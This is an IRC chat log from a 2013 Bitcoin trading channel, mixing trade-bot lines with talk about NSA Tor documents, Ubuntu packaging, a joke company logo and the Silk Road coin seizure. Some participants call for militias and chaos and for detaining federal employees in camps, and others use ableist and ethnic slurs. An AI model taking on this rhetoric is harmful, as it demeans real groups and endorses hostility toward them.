? Oct 05 15:28:38 great, Oct 05 15:47:20 [BTCTC] [BITVPS] 457 @ 0.00139973 = 0.6397 BTC [+] {4} Oct 05 16:21:53 [HAVELOCK] [CBTC] 1000 @ 0.00026399 = 0.264 BTC [+] {2} Oct 05 16:26:58 [HAVELOCK] [CBTC] 1000 @ 0.00026399 = 0.264 BTC [+] {2} Oct 05 17:06:38 [HAVELOCK] [AM100] 202 @ 0.00999857 = 2.0197 BTC [+] {2} Oct 05 17:14:45 [HAVELOCK] [AM100] 11 @ 0.01 = 0.11 BTC [+] {2} Oct 05 17:23:54 [BTCTC] [LABCOIN] 1090 @ 0.000249 = 0.2714 BTC [-] Oct 05 17:30:00 [HAVELOCK] [AM100] 120 @ 0.01 = 1.2 BTC [+] Oct 05 17:59:29 [BTCTC] [ASICMINER-PT] 1 @ 1.07 BTC [+] Oct 05 18:28:58 [HAVELOCK] [NEOBEE] 211 @ 0.00289526 = 0.6109 BTC [-] {2} Oct 05 18:28:59 [BTCTC] [ASICMINER-PT] 25 @ 1.09919998 = 27.48 BTC [+] {4} Oct 05 18:30:00 [BTCTC] [BASIC-MINING] 25 @ 0.048 = 1.2 BTC [+] Oct 05 18:31:00 [BTCTC] [BASIC-MINING] 7 @ 0.04232142 = 0.2962 BTC [-] {2} Oct 05 18:36:05 [BTCTC] [ASICMINER-PT] 13 @ 1.15253846 = 14.983 BTC [+] {3} Oct 05 18:45:15 [HAVELOCK] [AM100] 827 @ 0.0104562 = 8.6473 BTC [+] {8} Oct 05 18:46:15 [HAVELOCK] [AM100] 1250 @ 0.01074999 = 13.4375 BTC [+] Oct 05 19:01:33 ;;bc,24hprc Oct 05 19:01:33 130.00 Oct 05 19:13:02 http://www.breitbart.com/Big-Government/2013/10/05/Feds-Try-to-Close-the-OCEAN-Because-of-Shutdown Oct 05 19:13:03 Feds Try to Close the OCEAN Because of Shutdown Oct 05 19:14:43 [BTCTC] [FN] [DMS.SELLING] 23 @ 0.00515 = 0.1185 BTC [+] Oct 05 19:31:43 It's sad US citizens are too lazy to start militias and start chaos. Oct 05 19:32:48 +1 Oct 05 19:39:39 i was thinking, the correct thing to do for a state governor is to simply pass a bill ordering all federal employees arested Oct 05 19:39:44 take them to a camp somewherwe Oct 05 19:39:46 and that's that. Oct 05 19:40:09 for instance the arizona people could do it, after the entire "close grand canion" bs. Oct 05 19:49:16 [HAVELOCK] [NEOBEE] 211 @ 0.00285007 = 0.6014 BTC [-] {3} Oct 05 19:54:38 "It is on par with the government's ham-fisted attempts to close the DC WWII Memorial, an open-air public monument that is normally accessible 24 hours a day. By accessible I mean, you walk up to it. When you have finished reflecting, you then walk away from it. " Oct 05 19:54:39 lol Oct 05 19:57:55 basically obama's horde is trying to show to congress that they can do absolutely anything and the sheeple will just take it. Oct 05 19:58:00 that's the message, "you are alone". Oct 05 19:58:08 "we can grab any power we want. fuck you." Oct 05 19:58:18 that makes no sense Oct 05 19:58:44 he didn't shut down anything, congress did Oct 05 19:58:57 you're very confused. Oct 05 19:59:02 unrelatedly : nosuchlabs.com Oct 05 19:59:16 all that's still needed is a logo and away we go!!1eleven Oct 05 20:01:00 Interesting. Oct 05 20:04:32 [HAVELOCK] [AM1] 2 @ 1.13774999 = 2.2755 BTC [-] {2} Oct 05 20:05:32 today's crapola: http://apps.washingtonpost.com/g/page/world/gchq-report-on-mullenize-program-to-stain-anonymous-electronic-traffic/502/ Oct 05 20:07:13 http://apps.washingtonpost.com/g/page/world/nsa-research-report-on-the-tor-encryption-program/501/ Oct 05 20:07:13 NSA report on the Tor encrypted network - The Washington Post Oct 05 20:08:05 looks like at least one spook knows 'LaTex' Oct 05 20:08:37 apps ? lol Oct 05 20:09:24 what does nsa even do? Oct 05 20:09:27 s.nsa Oct 05 20:09:28 lol Oct 05 20:09:32 pretend to be the nsa? Oct 05 20:09:43 thestringpuller: burns $$$$ Oct 05 20:09:52 on a big far pyre Oct 05 20:09:56 *fat Oct 05 20:09:57 nice Oct 05 20:10:00 sign me up! Oct 05 20:11:10 thestringpuller WHEREAS, the individuals named have recently launched and intend to operate for the foreseeable future an unregistered corporation by the name "No Such lAbs" (NSA) dedicated to the production and marketing of a series of strong, fully integrated cryptography products, ensuring customers absolute immunity from third party attempts to access their data or communications ; Oct 05 20:11:15 other than that, it ipos Oct 05 20:11:39 http://thecable.foreignpolicy.com/posts/2013/10/04/not_even_the_nsa_can_crack_the_state_departments_online_anonymity_tool Oct 05 20:11:42 look at that shit. Oct 05 20:11:42 Not Even the NSA Can Crack the State Dept's Favorite Anonymous Network | The Cable Oct 05 20:11:45 mircea_popescu: i think he was thinking about the other one Oct 05 20:12:00 basically every contact in the "press" is being herded to defend this holy grail of "tor is actually safe" Oct 05 20:14:19 to be fair, there is a long tradition here in the usa of first arming some fellows and then sending armies to bump them off Oct 05 20:14:41 so it is even possible that one set of bureaucrats commissioned TOR and another, 'anti-' TOR Oct 05 20:15:14 it's possible, but not likely. what happened is that one set of bureaucrats made tor at great expense, and another set used it in a disaster-of-commons way Oct 05 20:15:26 now the former are trying to fix their broken china. Oct 05 20:15:31 sort of like the Soviet scenario of KGB vs GRU, or Hitler's 'two in a box' management style of abwehr vs gestapo. Oct 05 20:18:09 sort of like the bureaucratic scenario. Oct 05 20:18:23 this is why big governments can't have nice things, irrespective of what uyou might have heard. Oct 05 20:19:13 they occasionally pull off nice things, but solely by crowning a viceroy (e.g. Korolev) who has absolute grasp over some fiefdom. Oct 05 20:19:48 so then "by becoming small government" Oct 05 20:19:54 why yes, yes they do. that's the fucking argument. Oct 05 20:19:55 yeah Oct 05 20:26:27 http://www.washingtonpost.com/world/national-security/talk-by-roger-dingledine-of-torprojectorg-at-the-nsa/2013/10/04/cdd15234-2d1d-11e3-8ade-a1f23cda135e_story.html Oct 05 20:26:27 Talk by Roger Dingledine of Torproject.org at the NSA - The Washington Post Oct 05 20:26:38 "(U) 5. Oppressed Alice, who lives in a repressive country (no or limited free speech) and wants to talk about things contrary to her governments positions. The countries he used as examples were France, Germany (prohibitions on fascist writings?) and the US (not sure what he meant here?)." Oct 05 20:26:59 dingledine ? Oct 05 20:27:05 seriously ? Oct 05 20:29:41 he needs to meet my friend Dinah. Oct 05 20:31:29 in other news, mircea_popescu can officially get medical marijuana Oct 05 20:31:41 wait wut ? Oct 05 20:31:47 http://translate.google.com/translate?sl=ro&tl=en&js=n&prev=_t&hl=ro&ie=UTF-8&u=http%3A%2F%2Fwww.digi24.ro%2FStiri%2FDigi24%2FActualitate%2FSanatate%2FMedicament%2BTratamentul%2Bcu%2Bmarijuana%2Ba%2Bdevenit%2Blegal%2Bin%2BRomania Oct 05 20:32:17 wow that link is awful Oct 05 20:32:44 i don't know pot ever wasn't legal. Oct 05 20:33:06 but anyway, for everyone's lolfactor : ion tiriac is a rich romanian banker guy. his son is a retard. Oct 05 20:33:27 YAY Oct 05 20:33:28 coupla years back he was caught with ~3kgs of uncut cocaine in his car, and had his license suspended Oct 05 20:33:48 i guess it's a good thing he didn't try to sell it on silkroad. Oct 05 20:34:24 it'd have taken all of six months and landed him in jail for 800 years on account of it being bought by a dozen different undercover agents working for five or six different agencies. Oct 05 20:34:29 is that the reporter? Oct 05 20:34:33 ion tiriac? Oct 05 20:34:38 no ? Oct 05 20:35:00 where did ion tiriac come up then? Oct 05 20:35:40 well, it's a little anecdote i just recounted. Oct 05 20:35:48 ah Oct 05 20:36:19 pg. 16: "In our time in the lab, we found that running an nmap on a node that isoffering a hidden service will turn up the port that the hidden service is using to deal with incoming connections. It can then be directly connected to, outside of Tor." Oct 05 20:36:25 these fellows ever heard of iptables? Oct 05 20:37:03 i don't think this problem is avoidable Oct 05 20:37:47 if you configure the damn thing right, the only external port is TOR's standard one Oct 05 20:38:00 every 'onion' luser knows this Oct 05 20:38:07 except, apparently, the monkey Oct 05 20:38:51 jesuis check this shit out Oct 05 20:38:54 http://www.azd.uscourts.gov/sites/default/files/documents/top%2010%20local%20rule%20violations.pdf Oct 05 20:39:11 that loads up a document G:/shared/azdwebpage/blabla Oct 05 20:39:24 basically, a box running windows 95 ? Oct 05 20:39:46 holy shit, it's a .wpd Oct 05 20:44:10 asciilifeform what i meant was, as long as you have a port open, it's open for nmap too. Oct 05 20:44:17 in retrospect is not what you meant. Oct 05 20:45:05 even the lowest luser knows, i imagine, that you set up the service (e.g. http) on a local port, and expose only the tor port. Oct 05 20:45:34 the fellow running the port scan will see that the machine runs tor, and that's it Oct 05 20:45:56 this isn't exactly worthless info by itself, though Oct 05 20:46:06 not that many people have tor running on a hosted box Oct 05 20:46:38 inquisitor scans the whole site, then politely asks for snapshots of the dirty disks... Oct 05 20:46:56 right. Oct 05 20:49:31 "I'm mircea_popescu, bitch!" lolol Oct 05 20:53:00 Upvote this: http://www.reddit.com/r/Bitcoin/comments/1nsmoa/bitcointalk_hacked_thermos_offering_50_btc_reward/ Oct 05 20:53:20 [BTCTC] [PETA-MINE] 41 @ 0.45378048 = 18.605 BTC [-] {3} Oct 05 20:54:24 > thermos Oct 05 20:56:35 bwahaha Oct 05 20:56:40 i can't believe the girl's thing caught. Oct 05 20:57:24 [MPEX] [S.MPOE] 1400 @ 0.00084566 = 1.1839 BTC [-] Oct 05 20:59:06 gotta love how the spooks insist on calling keys 'cryptovariables,' so you can almost tell where the monkey plagiarized open source docs and where he actually spewed his own text Oct 05 21:01:28 [HAVELOCK] [AM1] 2 @ 1.13999999 = 2.28 BTC [+] Oct 05 21:01:54 unrelatedly, has anyone ever looked into ubuntu packaging ? Oct 05 21:02:00 ubuntu-standard depends on... wget. Oct 05 21:02:29 [HAVELOCK] [B] [XBOND] 152 @ 0.00126659 = 0.1925 BTC [+] Oct 05 21:05:31 what of it Oct 05 21:08:19 to download the .debs, you need a downloader Oct 05 21:08:42 sure. but there's no need to make that a dependency. Oct 05 21:09:08 it will run just fine w/o wget, and w/o avahi, and without jesus fucking christ. Oct 05 21:09:12 ubuntu is windows. Oct 05 21:09:43 even other distros do require wget Oct 05 21:09:58 ubuntu-standard is windows, certainly, but wget isn't a good example Oct 05 21:10:08 no, imo ity's the best example. Oct 05 21:10:13 never seen a linux box (save cut-down ones i prepared for various purposes) w/out wget or curl on it. Oct 05 21:10:16 there is no sane reason to require wget for -standard. Oct 05 21:10:23 you don't have wget, you can't use internet. Oct 05 21:10:36 asciilifeform still not a reason to require it. Oct 05 21:11:00 i think the updater on various 'friendly' package systems demands wget/curl/the like Oct 05 21:11:10 for fetching whatever. Oct 05 21:11:33 that's another thing Oct 05 21:11:41 there's no reason for -standard to depend on the updater being present. Oct 05 21:11:55 people go fucking crazy over "having a car requires you having insurance" Oct 05 21:12:03 wait till you see how many packages pull in xorg for no particular reason. Oct 05 21:12:05 then go around putting retarded dependencies in software. Oct 05 21:12:50 the ridiculous thing is, they have the concept of "recommended". not like it's either depend or nothing. Oct 05 21:16:50 wget is so laaaame though Oct 05 21:16:56 it can't grok links at all Oct 05 21:17:01 cURL is so much better Oct 05 21:18:17 also the ubuntu updater is based on aptitude no? why not just base something on debian instead of ubuntu? Oct 05 21:20:47 [BTCTC] [PETA-MINE] 9 @ 0.45 = 4.05 BTC [-] Oct 05 21:32:31 thestringpuller how's cookies going? Oct 05 21:40:34 http://dukeofmegadeus.tumblr.com/image/63187035555 Oct 05 21:40:57 Remains of Doma: Photo Oct 05 21:45:10 [BTCTC] [LABCOIN] 25000 @ 0.00024884 = 6.221 BTC [+] {7} Oct 05 21:45:56 http://31.media.tumblr.com/8dbe87937905e880ee4cd6369b1077ce/tumblr_mre2xmjRvT1srju7bo1_1280.jpg cc assbot Oct 05 21:46:11 [BTCTC] [LABCOIN] 3300 @ 0.00024939 = 0.823 BTC [+] {2} Oct 05 21:46:12 [BTCTC] [PETA-MINE] 50 @ 0.45 = 22.5 BTC [-] Oct 05 21:49:14 [HAVELOCK] [AM1] 2 @ 1.13999999 = 2.28 BTC [+] {2} Oct 05 21:55:20 [BTCTC] [BASIC-MINING] 3 @ 0.041 = 0.123 BTC [-] Oct 05 22:22:48 [BTCTC] [PETA-MINE] 33 @ 0.451 = 14.883 BTC [+] Oct 05 22:23:49 [BTCTC] [PETA-MINE] 10 @ 0.45 = 4.5 BTC [-] Oct 05 22:27:53 [BTCTC] [BASIC-MINING] 4 @ 0.0401 = 0.1604 BTC [-] {2} Oct 05 22:28:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14 BTC [+] Oct 05 22:29:55 [BTCTC] [BASIC-MINING] 6 @ 0.04001 = 0.2401 BTC [-] Oct 05 22:36:01 [BTCTC] [LABCOIN] 500 @ 0.000245 = 0.1225 BTC [-] Oct 05 22:36:01 [BTCTC] [COGNITIVE] 2 @ 0.07605 = 0.1521 BTC [-] Oct 05 22:37:02 [BTCTC] [CRYPTO-TRADE] 2 @ 0.14 = 0.28 BTC [+] Oct 05 22:38:03 [BTCTC] [BASIC-MINING] 4 @ 0.04001 = 0.16 BTC [-] Oct 05 22:39:04 [BTCTC] [BASIC-MINING] 15 @ 0.03986666 = 0.598 BTC [-] {2} Oct 05 22:41:06 [BTCTC] [BASIC-MINING] 3 @ 0.03726 = 0.1118 BTC [-] {3} Oct 05 22:42:07 [BTCTC] [ASICMINER-PT] 1 @ 1.086 BTC [-] Oct 05 22:44:09 [BTCTC] [BASIC-MINING] 15 @ 0.035 = 0.525 BTC [-] Oct 05 23:04:28 [HAVELOCK] [AM100] 95 @ 0.01089999 = 1.0355 BTC [+] Oct 05 23:05:29 [HAVELOCK] [AM100] 34 @ 0.011 = 0.374 BTC [+] Oct 05 23:08:10 http://www.theguardian.com/world/interactive/2013/oct/04/tor-stinks-nsa-presentation-document Oct 05 23:22:46 [HAVELOCK] [B] [XBOND] 850 @ 0.00120354 = 1.023 BTC [-] {6} Oct 05 23:54:10 http://nypost.com/2013/08/05/in-the-ho-tel-biz-lauren-silvermans-husband-owns-panama-prostitute-palace/ Oct 05 23:54:12 In the ‘ho’-tel biz: Lauren Silverman’s husband owns Panama ‘prostitute’ palace | New York Oct 05 23:58:21 [BTCTC] [FN] [DMS.PURCHASE] 26 @ 0.006212 = 0.1615 BTC [-] Oct 06 00:03:26 [HAVELOCK] [AM1] 1 @ 1.14 BTC [+] Oct 06 00:06:30 [BTCTC] [BASIC-MINING] 3 @ 0.035 = 0.105 BTC [-] Oct 06 00:07:54 http://www.reddit.com/r/Bitcoin/comments/1ns4oa/we_are_being_watched/ lol Oct 06 00:07:54 We are being watched... : Bitcoin Oct 06 00:08:15 two snatches in a bar. one says to the other Oct 06 00:08:18 hey... we're being watched. Oct 06 00:10:59 redditors really want to name theymos, thermos Oct 06 00:11:09 I'm ok with that Oct 06 00:11:17 redditors really want to matter. Oct 06 00:11:32 offtopic Oct 06 00:12:05 "Who else knows about your subversive projects?" herp. Oct 06 00:12:12 haha Oct 06 00:12:15 in its 10 year history, nothing subversive came out of reddit. Oct 06 00:12:30 in the remainder 5ish years of lifetime it still has, nothing subversive will come out of it. Oct 06 00:12:47 oh I agree with almost much of the hate about reddit Oct 06 00:12:55 it's 10yo already? Oct 06 00:13:29 i think so. early 2000ish, wasn;'t it ? Oct 06 00:13:47 spent their time being a shitty network back when everyone used stumbleupon and digg, Oct 06 00:13:49 I used it mostly in its first years, and I was slowly disgusted by it. despicable people who want to believe they're nice (and intelligent, and whatever) Oct 06 00:13:51 then digg sold out and went apeshit Oct 06 00:14:19 so now the contingent of highschoolers are telling each other stories about how cool they are on reddit. Oct 06 00:16:19 there is a saying, redditors are stupid people who try to appear intelligent, while 4channers are intelligent people who try to appear stupid (expect it's probably better said) Oct 06 00:16:48 well to their credit the 4chaners succeed a lot better than the redditards. Oct 06 00:18:43 well, reddit is famous for stealing content. many top posts "my daughter made this" etc. revealed to be fake Oct 06 00:18:58 that's when you realize karma, user moderation is shit Oct 06 00:19:31 usg generally is a hopeless endeavour. Oct 06 00:19:38 ugc* Oct 06 00:20:01 turns out there's not an army of competent and dedicated people just waiting for the chance to make nice things for free. Oct 06 00:20:24 so what's new about nsa labs except some lame bet? Oct 06 00:20:24 who knew, seriously. and how racist, chauvinist and everything that is. Oct 06 00:20:38 jurov not much. Oct 06 00:20:43 that certainly is a lame bet Oct 06 00:20:52 and website that redirects to http://mpex.co/index.php?mpsic=S.NSA Oct 06 00:21:12 well, domain. Oct 06 00:23:03 you must have had a bad experience with reddit mircea_popescu Oct 06 00:23:22 good.. and eulora does have some site? Oct 06 00:23:28 jurov nope. Oct 06 00:23:34 thestringpuller notrly. Oct 06 00:24:58 i'd like to try newest eulora client, it's somewhere? Oct 06 00:25:33 well yeah, same place Oct 06 00:25:47 http://trilema.com/2013/eulora-august-update/ Oct 06 00:25:49 Eulora August update pe Trilema - Un blog de Mircea Popescu. Oct 06 00:25:50 so I tried to make an altcoin (the bernankoin), but I'm stuck. not having bitcointalk doesn't help either Oct 06 00:26:09 well, Oct 06 00:26:11 do you have a logo? Oct 06 00:26:14 or did you mean the precompiled ? Oct 06 00:26:24 no, that must be why it doesn't work! Oct 06 00:26:33 ;) Oct 06 00:26:41 http://minigame.bz/eulora/news/news.txt Oct 06 00:26:55 http://minigame.bz/eulora/binaries/ is binaries. Oct 06 00:27:09 actually I'm stuck at the genesis block, or something like that (but I fixed the problem that is on the altcoin howto, not the one I have now) Oct 06 00:27:12 yes... just wanted to explore around Oct 06 00:27:32 .bz ? Oct 06 00:27:41 biznis Oct 06 00:27:44 server may be down if they're dicking with it tho, so might have to retry later. Oct 06 00:27:53 no that's .biz Oct 06 00:28:13 no thats business Oct 06 00:28:48 belize. the country of bitcoin scams Oct 06 00:28:49 anyway, i think we have a s.nsa logo Oct 06 00:29:01 anyone here a logo artist ? Oct 06 00:29:17 hire that solar mining company guy Oct 06 00:29:24 he does wonders Oct 06 00:29:45 i can add cherries and trucks and rainbows Oct 06 00:29:46 can't detect if serious Oct 06 00:29:53 or ima end up with angry guy face all over my logo Oct 06 00:29:59 im srs!!! Oct 06 00:30:06 k Oct 06 00:30:15 am i ever? Oct 06 00:30:48 I've done crappy logos with inkscape Oct 06 00:30:51 or even gimp Oct 06 00:31:08 with gimp you can logo like a chimp! Oct 06 00:32:22 oh, the american NSA logo is hard. I wanted to try a parodyw Oct 06 00:33:07 i was thinking eagle-holding-cox Oct 06 00:33:08 but meh. Oct 06 00:34:27 what I would see is NSA, with the A being a flask Oct 06 00:34:34 because labs Oct 06 00:34:41 meh. Oct 06 00:34:41 that's not very original Oct 06 00:34:43 ;;google trilema Oct 06 00:34:45 Trilema - Un blog de Mircea Popescu.: ; Trilemma - Wikipedia, the free encyclopedia: ; Münchhausen trilemma - Wikipedia, the free encyclopedia: Oct 06 00:34:50 ha! Oct 06 00:35:05 suck it wikipedia. Oct 06 00:35:16 that's cause you spelled trilemma differently Oct 06 00:35:21 ;;google trilemma Oct 06 00:35:22 Trilemma - Wikipedia, the free encyclopedia: ; Lewis's trilemma - Wikipedia, the free encyclopedia: ; Münchhausen trilemma - Wikipedia, the free encyclopedia: Oct 06 00:35:28 :P Oct 06 00:35:41 lmao last proposition http://bitbet.us/propositions/ Oct 06 00:35:43 who cares about trilemma Oct 06 00:35:49 [hover over for text to show] Oct 06 00:36:23 lol how does one send .39 btc and an email to addy ? Oct 06 00:36:45 magick Oct 06 00:37:00 [BTCTC] [BITVPS] 650 @ 0.00104684 = 0.6804 BTC [-] {3} Oct 06 00:37:31 but respect for captcha solving Oct 06 00:37:35 yeah. Oct 06 00:38:34 http://i.imgur.com/RRA0Hj1.png Oct 06 00:38:54 looks like a car bashed in the wall Oct 06 00:39:40 did you run out of pixels or what happened to that a ? Oct 06 00:40:04 perfect! Oct 06 00:40:21 jurov can you add the rainbows to this? Oct 06 00:41:11 just did it in one go Oct 06 00:41:34 and yeah lazyness Oct 06 00:42:09 also can i ipo nasa then?! Oct 06 00:42:35 wha'd tha be Oct 06 00:43:05 dunno Oct 06 00:43:10 running a btc node on the moon? Oct 06 00:43:59 fuck, I did it in in insckape, but pressing esc erased my whole thing Oct 06 00:45:21 now do ctrl+z Oct 06 00:45:47 stop teaching him thingas Oct 06 00:47:08 http://live.coinbr.com/images/nsa_rainbows.png Oct 06 00:48:40 kakobrekla: ^^ Oct 06 00:49:12 holy shit my temporal lobe fell off Oct 06 00:49:36 no, that's not how it works; esc while I was drawing the unfinished path Oct 06 00:51:41 http://i.imgur.com/GM0b35K.png with unintentional swastika Oct 06 00:52:07 jurov: lol, I don't even know how to do that Oct 06 00:52:24 lolz Oct 06 00:52:29 that's like the most illegible logo in the history of grafitti. Oct 06 00:52:58 why not just write the letters on top of each other and bne done with it Oct 06 00:58:27 okay: http://i.imgur.com/yAmrHMl.png Oct 06 01:00:22 [HAVELOCK] [AM1] 1 @ 1.14 BTC [+] Oct 06 01:03:04 http://www.fontspace.com/dingfontbats/sassys-teddys-3#?text=NSA&fontsize=200&foreground=000000&background=FFFFFF Oct 06 01:03:05 Sassys Teddys 3 font by Dingfontbats - FontSpace Oct 06 01:03:29 that's even for bizness than trilema's comic sans Oct 06 01:03:33 more* Oct 06 01:05:01 trilema has a comic font ? Oct 06 01:05:03 but you can't put them on top of each other Oct 06 01:05:56 for that i recommend http://www.fontspace.com/bythebutterfly/littlemisspriss Oct 06 01:06:33 well yeah, that one: http://i.imgur.com/hDTH7ZN.png Oct 06 01:15:23 http://shrani.si/f/1L/NK/2b8chSA5/nsa.png Oct 06 01:15:40 and a message from our sponsor hypnotoad: buy stock. Oct 06 01:16:09 ahaha Oct 06 01:19:41 [BTCTC] [ASICMINER-PT] 1 @ 1.15 BTC [+] Oct 06 01:28:07 mircea_popescu: thanks, great post. Oct 06 01:28:27 ;) Oct 06 01:28:32 not so much information, but nice to read, to continue with my first statement ;) Oct 06 01:32:10 https://images.4chan.org/g/src/1381010808668.png Oct 06 01:33:10 >_< Oct 06 01:35:46 so why are the forums still down? i mean, 90 % of all "job offers" are "i'm a dev etc." posts. is the hole crew so uberleet? Oct 06 01:37:24 looking for how they got hacked so it doesn't happen again? Oct 06 01:38:04 Last I read Theymos said they were rebuilding the server and reinstalling the software stack. Oct 06 01:38:45 pankkake: yes, that's the goal. there is a 50 btc bounty for the one who can reconstruct the hack. Oct 06 01:49:10 [BTCTC] [PETA-MINE] 26 @ 0.45 = 11.7 BTC [-] Oct 06 01:54:27 new idiot circus: http://www.change.org/petitions/the-federal-bureau-of-investigation-fbi-release-the-confiscated-3-6-million-in-bitcoins-from-silk-road-founder-ross-william-ulbricht-back-into-the-bitcoin-community Oct 06 01:55:38 how wrong this is.. Oct 06 01:55:44 actually they do want to liquidate the coins Oct 06 01:56:08 and the best for the community would be to just "lose" them Oct 06 01:56:31 let's say they burn DPR's computer on a pyre in the public square. This would in principle accomplish the same thing. Oct 06 01:56:35 i'm not that interested that stupid fbi guys unload 28k in a market order =D Oct 06 01:57:11 like firing gold into the sun. anyone who holds the metal would be slightly richer. Oct 06 01:57:27 yes Oct 06 01:57:33 I support the idea that the FBI should set up a Bitcoin faucet to give these back to the community slowly. << well okay, that's a cute idea Oct 06 02:03:30 someone is ddosing a lot of pools Oct 06 02:03:43 ;;bc,stats Oct 06 02:03:47 Current Blocks: 261954 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 125 blocks | Next Difficulty In About: 13 hours, 45 minutes, and 41 seconds | Next Difficulty Estimate: 188534237.595 | Estimated Percent Change: 26.68677 Oct 06 02:03:56 I support the idea of punishing bitcoiners that assume every situation would be better decided by themselves even though they have no actual authority over or experience in anything Oct 06 02:03:56 what was the "better" pool overview website again? Oct 06 02:04:08 >_< Oct 06 02:04:44 ThickAsThieves: but you can't do anything about it (except create a change.org thing?) Oct 06 02:05:56 i can put them on ignore Oct 06 02:06:02 but Theymos took that away Oct 06 02:06:07 http://blockorigin.pfoe.be/chart.php << that's the one i was looking for Oct 06 02:06:07 :) Oct 06 02:06:27 [HAVELOCK] [AM1] 13 @ 1.16076923 = 15.09 BTC [+] {3} Oct 06 02:06:50 i mean, Thermos Oct 06 02:07:03 hehe Oct 06 02:07:28 [HAVELOCK] [AM100] 111 @ 0.0115 = 1.2765 BTC [+] {2} Oct 06 02:07:38 asciilifeform lol tjhat's happening. Oct 06 02:09:27 ThickAsThieves you don't understand the free market man. Oct 06 02:09:30 the free market of ideas. Oct 06 02:09:54 opinions are like assholes, some should be explored, most are just shitty Oct 06 02:10:02 nice Oct 06 02:10:20 http://cdn.bleacherreport.net/images_root/slides/photos/000/976/629/asian-baseball-boobs-cleavage-girl-japanese-sexy-softball-uniform-sexy-hot-babes-Tremendo-clean_large_display_image.jpg Oct 06 02:10:41 lmao that;s some urlizing right there Oct 06 02:10:42 too bony Oct 06 02:11:36 if i were the fbi and saw that change.org crap i'd basically be devising the way to cause the most tears Oct 06 02:12:37 reddites telling fbi to give SR btc to the 'community' Oct 06 02:12:38 he's never coming out either way. Oct 06 02:12:41 meanwhile, http://www.dailymail.co.uk/news/article-2380327/Baby-bird-attempts-swallow-carers-thumb-feed-falling-nest.html Oct 06 02:12:51 ChaangNoi: http://www.change.org/petitions/the-federal-bureau-of-investigation-fbi-release-the-confiscated-3-6-million-in-bitcoins-from-silk-road-founder-ross-william-ulbricht-back-into-the-bitcoin-community Oct 06 02:13:30 how the fuck is that news Oct 06 02:14:15 i guess that makes all of youtube news Oct 06 02:14:38 maybe they should send it to the btc address with the most coins Oct 06 02:15:02 lmao Oct 06 02:15:03 but why would they give it? when they seize usds, they don't give it to the usd community Oct 06 02:15:05 it makes zero sense Oct 06 02:15:14 brain not found Oct 06 02:15:26 the pyre. and sell tickets. better ROI. Oct 06 02:15:29 pankkake you don't understand reddit. ask it anything, it'll say the same thing : "i want sum gimme" Oct 06 02:25:53 lulz Oct 06 02:26:10 good. let's go ask reddit to sign a petition for fbi to invest it into mpoe bonds Oct 06 02:27:04 no, they would ask to bail out labcoin Oct 06 02:27:08 can we insist they spend it on hookers and blow? Oct 06 02:27:26 they could pay to blow hookers... Oct 06 02:27:31 we can put them into more tor open source development Oct 06 02:27:33 they would like that Oct 06 02:27:43 yeah have them donate it to Tor Oct 06 02:27:45 blastbob1 blasts right in lol Oct 06 02:27:52 i third the motion. Oct 06 02:28:28 a tor detector detector Oct 06 02:28:30 the FBI would never do something as productive as hookers and blow Oct 06 02:32:53 [HAVELOCK] [SMG] 5045 @ 0.00021932 = 1.1065 BTC [+] {12} Oct 06 02:33:54 [HAVELOCK] [SMG] 4105 @ 0.00022997 = 0.944 BTC [+] {3} Oct 06 02:44:20 maybe they could make a tor tor Oct 06 02:44:37 so like, everyone's on tor right ? Oct 06 02:44:51 so you can have within tor this plaintext protocol which nobody can identify Oct 06 02:45:04 so you know that someone on tor isn't using tor Oct 06 02:45:08 but you can't find out who Oct 06 02:49:09 [BTCTC] [PETA-MINE] 28 @ 0.45 = 12.6 BTC [-] Oct 06 02:51:29 so let's say you cloak and sign traffic with gpg or something like that.. like you do for order transmission. that's what ssl does, right? Oct 06 02:52:18 nope. Oct 06 02:52:26 that's what ssl pretends to do. Oct 06 02:52:44 yes, because it's via a 3rd party Oct 06 02:52:46 right? Oct 06 02:53:39 not exactly and not just. think about it : gpg requires that i have your public key to send you stuff Oct 06 02:53:42 and you have mine to reply. Oct 06 02:53:52 ssl only requires you have the server's public key. it's thus half a protocol. Oct 06 02:54:22 more importantly, using pgp-style tools you have a dedicated signature identification step. you somehow acquire my signature. such as, from me. Oct 06 02:54:40 in ssl, you acquire it on the basis that a third party says its ok, much like the dns system. Oct 06 02:54:40 ah i see Oct 06 02:54:53 the dns system is notoriously insecure, as proven by all the cache poisoning attacks etc. Oct 06 02:55:06 recently google had its domains hijacked and there was jack shit it could do. for like days. Oct 06 02:55:15 [BTCTC] [LABCOIN] 19275 @ 0.00021543 = 4.1524 BTC [-] {4} Oct 06 02:57:03 in opposition to this, something like scp over keybased ssh would be secure, in the sense you can't read messages. Oct 06 02:57:31 it would still not be anyonymous, which is in general a much harder problem than cryptography. which is why bitcoin is secure but not anonymous, and why tor fails to deliver on anonymity etc. Oct 06 02:59:30 thanks Oct 06 03:12:32 [BTCTC] [LABCOIN] 1500 @ 0.0002151 = 0.3227 BTC [-] Oct 06 03:13:33 [BTCTC] [LABCOIN] 41859 @ 0.0002085 = 8.7276 BTC [-] {18} Oct 06 03:14:35 [BTCTC] [LABCOIN] 120741 @ 0.0002 = 24.1482 BTC [-] {6} Oct 06 03:22:25 howard wang, the former dev of labcoin has spoken ... http://pastebin.com/rQfbUA8d Oct 06 03:24:56 raise 7500 BTC, hire random dude on oDesk Oct 06 03:25:01 LOL Oct 06 03:25:03 yeah. Oct 06 03:25:04 insane Oct 06 03:25:07 read further Oct 06 03:25:17 it's even worse Oct 06 03:25:24 they don't pay the guy :o Oct 06 03:25:53 lol. Oct 06 03:26:15 the flaming globes sigmund! it is just as you have prophesized! Oct 06 03:28:15 TheSeven http://pastebin.com/rQfbUA8d you got a comment ? Oct 06 03:28:26 I had to google that, I forgot about Flaming Globes of Sigmund Oct 06 03:28:37 I wish Rochelle, Rochelle existed Oct 06 03:28:44 odesk is 99.5% indians and losers at same time Oct 06 03:29:01 the .5 is just indian or just loser Oct 06 03:29:14 I don't know odesk specifically, but most similar websites are like that Oct 06 03:29:25 well what are they gonna do. Oct 06 03:29:27 hmm what is this AVAtrade whose ad I just saw on facebook? A onventional forex site now including bitcoin? Oct 06 03:31:39 "And, it happened that we have access on some 130nm library, so she decided to continue with this library." Oct 06 03:31:48 "we stole some more software". Oct 06 03:32:01 which reminds me, haven't heard of the bitfinex thing in a while. Oct 06 03:35:00 raise 7500 BTC, be a cheap ass and don't pay for anything Oct 06 03:35:55 [BTCTC] [LABCOIN] 1633 @ 0.00019993 = 0.3265 BTC [-] {3} Oct 06 